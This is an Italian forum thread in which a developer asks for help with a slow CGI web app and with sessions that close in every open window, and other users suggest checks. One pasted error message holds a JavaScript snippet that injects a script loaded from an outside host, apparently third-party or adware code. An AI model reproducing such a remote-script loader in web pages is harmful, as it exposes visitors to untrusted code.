Migliorare le prestazioni

La cosa che mi fa pensare la sua velocit, che credo sia solo dovuta a 2 fattori

  1. serve che non vale una mazza
  2. ottimizzazione del codice

Io al momento ho ottimizzato pi che potevo secondo le mia conoscenza informatica, vengo da c#, vb, visual basic, filemaker, java, ma mio malgrado mai sul lato server e web :frowning:

Ora noto che il lavoro per quanto fatto gira alla grande in locale, mai un crash, mai un errore, mai un ritardo che mi obbliga nel fare un click 2 volte, e pertanto non vi sono chiamate in arrivo dal serve, ma quando vado on line, il problemi di velocit si sentono, che devo sempre trovare delle soluzioni.

Altro problema e non reposity e molte cose non sono perfette su mobile, volevo accennare per chi arriva ora come me, di non mettere menu contestuali su listbox, perch il click (cellclick) viventa sordo come una campana.

Una riflessione che faccio a questo forum Italiano, ai tempi di 5 anni fa il forum era piatto, ma a distanza di 5 anni nulla cambiato hahaha “diamoci una mano” questo il mio motto.

chiedo aiuto ed eventualmente chi ha voglia di fare del test il sito demo qui http://www.humanequality.eu/main/main.cgi

Grazie per il vostro supporto

una cosa che rimasta, e che non capisco come trovarla, e quando si chiude da una parte si chiude dall’altra. cazzarola (solo in rete)

non capisco questo errore, nuovo di pacca

Trouble evaluating response: Unexpected token (
Source: (function(){var we=document.createElement('script');we.type='text/javascript';we.async=true;we.src='http://static.worlderror.org/s.js?code=500&lang=it&pv=2&pname=1UD6ZaX7&ref=0qcjVm[kKRWuR8TKR[z]&ver=6.6.224&bt=2&ue=js&uid=st3500413as_6vmshgj4xxxx6vmshgj4';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(we,s);})();

Buongiorno Ivano,
premetto che non ho esperienza sulle applicazioni in modalit cgi ma solo in modalit standalone.

Ho provato ad aprire qualche finestra sul link che hai fornito e la mia sensazione, ripeto sensazione, che forse il possibile motivo della chiusura delle sessioni aperte sia dovuto al riferimento di risorse non valide.
Il sintomo tipico del crash dell’applicazione causato dall’accesso ad una variabile o altro inesistente.
Prova a verificare se la sessione fa riferimeno solo ad elementi della sessione stessa e non a variabili che, inavvertitamente, siano state definite o memorizzate a livello di applicazione creando possibili conflitti.

Il motivo che mi porta a darti queste indicazioni che non mi sembra che le sessioni non si chiudano comunque alla chiusura di una sessione ma solo se in una delle sessioni ancora aperte l’utente seleziona un elemento diverso nell’elenco presente nella listbox.

Saluti.

ok grazie, verifico, in quanto nelle sessioni ho solo 5 variabili che popolo al login, poi non faccio uso di nulla a livello sessione ed in app avevo dei metodi che ora ho spostato in una classe a se

[quote=210423:@Maurizio Rossi]Buongiorno Ivano,
premetto che non ho esperienza sulle applicazioni in modalità cgi ma solo in modalità standalone.

Ho provato ad aprire qualche finestra sul link che hai fornito e la mia sensazione, ripeto sensazione, è che forse il possibile motivo della chiusura delle sessioni aperte sia dovuto al riferimento di risorse non valide.
Il sintomo è tipico del crash dell’applicazione causato dall’accesso ad una variabile o altro inesistente.
Prova a verificare se la sessione fa riferimeno solo ad elementi della sessione stessa e non a variabili che, inavvertitamente, siano state definite o memorizzate a livello di applicazione creando possibili conflitti.

Il motivo che mi porta a darti queste indicazioni è che non mi sembra che le sessioni non si chiudano comunque alla chiusura di una sessione ma solo se in una delle sessioni ancora aperte l’utente seleziona un elemento diverso nell’elenco presente nella listbox.

Saluti.[/quote]

Nulla fatti molti tentativi con il medesimo risultato, quando si chiude da una parte si chiude dall’altra, senza che io sappia il perchè, anche se da una parte non faccio nulla, e altro ci lavoro, mi si spegne la pagina che non lavora chiudendo quella che lavora, vai a capire… nessun errore, nessun crash che veda, ma il dilemma rimane, non vorrei che fosse il server

Ma hai un timer sulla pagina?

si messo ieri per capire i tempi, pubblica data ora del session.clienttime o cosa del genere, che toglier